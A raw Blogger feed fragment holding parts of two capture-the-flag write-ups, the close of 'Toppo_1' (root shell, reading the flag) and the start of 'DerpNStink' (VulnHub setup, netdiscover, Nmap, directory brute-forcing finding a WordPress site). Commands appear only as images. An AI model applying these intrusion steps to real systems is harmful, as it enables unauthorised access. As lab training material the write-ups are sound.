/&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Now it&#39;s very simple to get a root shell, just by improving the shell:&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiXWzOzi-zRc5ZEyKwme_x3k7NwSb7tDpceodEtfGiN9W7eEJ3bYb4I6EGcR83ScN_mF9qpzn2k2yf7bqT9tFmNbou2i54cbdy29bNqPYVnr4QuIrz53qnAT9GbbgVgRvIWVIDkl1C5BfiO0f9iwyCMFI45-mtu_V8q-f066irqgXMuSMDLPwIBhXPzjw=s738&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;70&quot; data-original-width=&quot;738&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiXWzOzi-zRc5ZEyKwme_x3k7NwSb7tDpceodEtfGiN9W7eEJ3bYb4I6EGcR83ScN_mF9qpzn2k2yf7bqT9tFmNbou2i54cbdy29bNqPYVnr4QuIrz53qnAT9GbbgVgRvIWVIDkl1C5BfiO0f9iwyCMFI45-mtu_V8q-f066irqgXMuSMDLPwIBhXPzjw=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;5 - READING THE FLAG&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Going to home folder &lt;b&gt;/root&lt;/b&gt; we can read&lt;b&gt; flag.txt&lt;/b&gt;:&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEj6eThWdk-kBKuJP2cJ6n5_wWSVe4I7oXfw5BafCHbepGz0k1RxRMIS2VdmKl6LyRCi5ihPP6Fv2eyzrZ47LuTUQPyn0X0AeeuMdfLEm14Lip5T-rgjJseEeONj_Bz9xRvZGCB5TdYTJQqnTCidqM_qI9ZJ5Jo-RA15SMtIWS7Jz9QnOzfiCbq6N-dGbQ=s845&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;364&quot; data-original-width=&quot;845&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEj6eThWdk-kBKuJP2cJ6n5_wWSVe4I7oXfw5BafCHbepGz0k1RxRMIS2VdmKl6LyRCi5ihPP6Fv2eyzrZ47LuTUQPyn0X0AeeuMdfLEm14Lip5T-rgjJseEeONj_Bz9xRvZGCB5TdYTJQqnTCidqM_qI9ZJ5Jo-RA15SMtIWS7Jz9QnOzfiCbq6N-dGbQ=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/1947953814412763707/posts/default/1340956702613518385'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/1947953814412763707/posts/default/1340956702613518385'/><link rel='alternate' type='text/html' href='https://www.whitelist1.com/2022/02/toppo1.html' title='Toppo_1'/><author><name>Whitelist</name><uri>http://www.blogger.com/profile/11945670003912610776</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/a/AVvXsEhKc6UrP31n82oSCc0-awWjHoCwtzDfu2ub2t5iX0UNfT3T-TIq51rwF23FKVCE1wbQLdu-xzH4Wf8c38Mz1vQ4XBUYOmAj1k87ZkVlSqjP2s8277mxjvi_thdQOHOwhKuR_4h0ddE26vjs8Y3C2WYuv3EwD18HV49a6QGiYcz3a9fvlRng2NxF8k15fA=s72-c" height="72" width="72"/></entry><entry><id>tag:blogger.com,1999:blog-1947953814412763707.post-3612734954467894871</id><published>2022-02-03T14:05:00.000-06:00</published><updated>2022-02-03T14:05:27.636-06:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="CAPTURE THE FLAG -   VULNERABLE MACHINES"/><title type='text'>DerpNStink</title><content type='html'>&lt;p&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;b style=&quot;color: #6fa8dc; font-family: arial;&quot;&gt;DERP_N_STINK_1&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Layout for this exercise:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEisJCj2aqYXVcqpG_Ng11CJsiuPPkaAoPNRTPqaw9JqhHiMnns5ZKYDF1fGR7l3hehdPVTAxtFnKCqydedvekhMteyiERSk4vOMHHgwUl0hAomnJD1NgowK8lG7_-sDB7JXs7t1hdf7I43DJIvAA0hmuHc3j4ez6XvR9ZGV44AMEPqT-5KRR3jgou62VQ=s633&quot; style=&quot;clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;245&quot; data-original-width=&quot;633&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEisJCj2aqYXVcqpG_Ng11CJsiuPPkaAoPNRTPqaw9JqhHiMnns5ZKYDF1fGR7l3hehdPVTAxtFnKCqydedvekhMteyiERSk4vOMHHgwUl0hAomnJD1NgowK8lG7_-sDB7JXs7t1hdf7I43DJIvAA0hmuHc3j4ez6XvR9ZGV44AMEPqT-5KRR3jgou62VQ=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;p&gt;&lt;b style=&quot;color: #6fa8dc; font-family: arial; font-size: large;&quot;&gt;1 - INTRODUCTION&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;background-color: white; font-family: arial;&quot;&gt;-&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;background-color: white; font-family: arial;&quot;&gt;&amp;nbsp;The goal of this exercise is to develop a hacking process (discovering 4 flags) for the vulnerable machine&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;&lt;b&gt;DerpNStink&lt;/b&gt;&lt;/span&gt;&lt;span style=&quot;background-color: white; font-family: arial;&quot;&gt;, from the VulnHub pentesting platform.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div style=&quot;background-color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;&quot;&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;-&amp;nbsp;&lt;b&gt;DerpNStink&lt;/b&gt;&amp;nbsp;can be downloaded from here:&lt;/div&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://www.vulnhub.com/entry/derpnstink-1,221/&quot;&gt;https://www.vulnhub.com/entry/derpnstink-1,221/&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;background-color: white; font-family: arial;&quot;&gt;- Once downloaded&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;background-color: white; font-family: arial;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;b style=&quot;font-family: arial;&quot;&gt;DerpNStink&amp;nbsp;&lt;/b&gt;&lt;span style=&quot;background-color: white; font-family: arial;&quot;&gt;and extracted with VirtualBox:&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgQUhUfF1tfqG0RTFY7zGJ-D9VMsXu2Rszx7IgrkzrjSEu_0Gac7wJONnAyhzzhZC7qNNBCMuIP9T85PhaZphYVzFjCv22l6QWFyG3S6yTCYyDZFcLpYa5iBLSenSl6ApM7bBiYEy1AcAtl47SKelHFn4tiN7syBkGYXbEgwyolCR0jCvg90LNuYMAHdA=s442&quot; style=&quot;clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;442&quot; data-original-width=&quot;438&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgQUhUfF1tfqG0RTFY7zGJ-D9VMsXu2Rszx7IgrkzrjSEu_0Gac7wJONnAyhzzhZC7qNNBCMuIP9T85PhaZphYVzFjCv22l6QWFyG3S6yTCYyDZFcLpYa5iBLSenSl6ApM7bBiYEy1AcAtl47SKelHFn4tiN7syBkGYXbEgwyolCR0jCvg90LNuYMAHdA=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;2 - ENUMERATION&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- netdiscover identifies &lt;b&gt;DerpNStink&lt;/b&gt;&#39;s IP 192.168.1.32:&lt;/span&gt;&lt;/div&gt;&lt;/span&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhBoOWHpoyZ0yd1A-FCToLYutmYXzoN94wMdGbGobodtvxsf_GJ-JrFhJSjEdbsStSxn1Sqq04JdNDU8zt0WIxR0HijyhmTSHduLZadujPfCV9pVtHePf99qo-H2hFyp_amUgulsysbhU44FlMwAn-srGz9eQpKh9oNF9G1YWk9IL5L0S1qsWqHO6ffKg&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;54&quot; data-original-width=&quot;428&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhBoOWHpoyZ0yd1A-FCToLYutmYXzoN94wMdGbGobodtvxsf_GJ-JrFhJSjEdbsStSxn1Sqq04JdNDU8zt0WIxR0HijyhmTSHduLZadujPfCV9pVtHePf99qo-H2hFyp_amUgulsysbhU44FlMwAn-srGz9eQpKh9oNF9G1YWk9IL5L0S1qsWqHO6ffKg=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjd5wlVD3nzUehj6X9mHR4VLDAqdPUtYG-1Oc52DZw5OrYejRk2yNcwJGiIAvWBwLyeKEBZJ0IExrmvrzxWE-s-eUQdnnhy6dMqhh08l5HGps9tb8WuGyYA7reyhxwCWI9Sad2jXBBtB-Th5mPYc_KIxI3kRfWqtIq_nt1NbreSI7wjT4Wrq6vkj5bRbw&quot; style=&quot;clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;279&quot; data-original-width=&quot;844&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjd5wlVD3nzUehj6X9mHR4VLDAqdPUtYG-1Oc52DZw5OrYejRk2yNcwJGiIAvWBwLyeKEBZJ0IExrmvrzxWE-s-eUQdnnhy6dMqhh08l5HGps9tb8WuGyYA7reyhxwCWI9Sad2jXBBtB-Th5mPYc_KIxI3kRfWqtIq_nt1NbreSI7wjT4Wrq6vkj5bRbw=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;- Scanning with Nmap:&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEirOPOgrcqzRt7C7TlfE92oQeXFn7NuuM0z_gKj-yc3i8MMInVMF5I-D6dPTFyWvPCR5kVa4RJCGVDM5ivFf7T2IjjvfAbGnUmtmQoG5hxIhzx8t-1Q8GAlRyyXkvCgbDFmxyx-z6YE4o5aQyWRAw2zsAMgowDt-YzBX3dDp0fKo6Pgv2rYiPW49P-2jg&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;238&quot; data-original-width=&quot;435&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEirOPOgrcqzRt7C7TlfE92oQeXFn7NuuM0z_gKj-yc3i8MMInVMF5I-D6dPTFyWvPCR5kVa4RJCGVDM5ivFf7T2IjjvfAbGnUmtmQoG5hxIhzx8t-1Q8GAlRyyXkvCgbDFmxyx-z6YE4o5aQyWRAw2zsAMgowDt-YzBX3dDp0fKo6Pgv2rYiPW49P-2jg=s16000&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Scanning deeper port 80 we discover &lt;b&gt;robots.txt&lt;/b&gt; and directories &lt;b&gt;/php&lt;/b&gt;, &lt;b&gt;/temporary:&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhLWgpF3cMyUubcvok-VUao3pAoSQ8GNhVtTJF59stvbdeuyO3pkUFQhmJFgEJ9RflITD_BytQ725K_8I-lsHxJnQeJeghu8DUMmQhuNMdyHn3UUFiYYBfSj2yPg_VlhUytMF6fhwYL_PFh5M1zm7lRCdrbjAV5YJVAr1fdx3BWrJ5PoWQybSp9K5LNeA&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;292&quot; data-original-width=&quot;557&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhLWgpF3cMyUubcvok-VUao3pAoSQ8GNhVtTJF59stvbdeuyO3pkUFQhmJFgEJ9RflITD_BytQ725K_8I-lsHxJnQeJeghu8DUMmQhuNMdyHn3UUFiYYBfSj2yPg_VlhUytMF6fhwYL_PFh5M1zm7lRCdrbjAV5YJVAr1fdx3BWrJ5PoWQybSp9K5LNeA=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Going to the browser:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjteOXpVTwdbkjYsX2ldpcmU3hXG1N3QGSdbHEN2bldD85aITbfUu1TphP-D-8sJeg5TGugZXKLAryN0Dt9Uwd51rKWy9YGJ8ABY00whP-DJV_n5X6kvt9c2X7dM7wf1pxtzlIRoC2YvqNUw5aOxHRkpLME7urrkfa6hd7yXWF9fr7ZY0Pwxpy1UE_jVQ&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;708&quot; data-original-width=&quot;755&quot; height=&quot;600&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjteOXpVTwdbkjYsX2ldpcmU3hXG1N3QGSdbHEN2bldD85aITbfUu1TphP-D-8sJeg5TGugZXKLAryN0Dt9Uwd51rKWy9YGJ8ABY00whP-DJV_n5X6kvt9c2X7dM7wf1pxtzlIRoC2YvqNUw5aOxHRkpLME7urrkfa6hd7yXWF9fr7ZY0Pwxpy1UE_jVQ=w640-h600&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- dirbusting the web server we also discover directory &lt;b&gt;/weblog&lt;/b&gt;, what according to its content seems to be a &lt;b&gt;Wordpress&lt;/b&gt; webpage:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjJUgGrLhgl-yoSUwLaPQ-4zvTapnaJKI603fplW3oXYmfqvxw3p7WE2ItOHqckXnJoid0T81bpbFV4HdlgQTVIbG0Z1Ao0-uupLB_gPvUx1uUMC3iNgxhUyejVVBnWlFlOrlToqlfd17oTV6gwSb-_IsWjNpX-BSSL_U81_0znm_hdQd8q-V7qFT8frg&quot; style=&quot;clear: left; display: inline !important; font-family: arial; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;607&quot; data-original-width=&quot;667&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjJUgGrLhgl-yoSUwLaPQ-4zvTapnaJKI603fplW3oXYmfqvxw3p7WE2ItOHqckXnJoid0T81bpbFV4HdlgQTVIbG0Z1Ao0-uupLB_gPvUx1uUMC3iNgxhUyejVVBnWlFlOrlToqlfd17oTV6gwSb-_IsWjNpX-BSSL_U81_0znm_hdQd8q-V7qFT8frg=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjwL1kTAfdS_hX_qNje3xDn317ZJw_dJ0vv8IOLgsVmuLhW8LWVreFBLrr0GTnZ9_ib3-BkEXwJjoquBrFU60PGlenulaOjoqiJy3MQTMMXsOP81pf9i-k9KbfpZe1vDTiiMJZ23nrkdcW-fgMUe-3cQX9hOHSQH7TzG2wr849zdf8l-5KmHlyHABKKrQ&quot; style=&quot;clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;158&quot; data-original-width=&quot;671&quot; 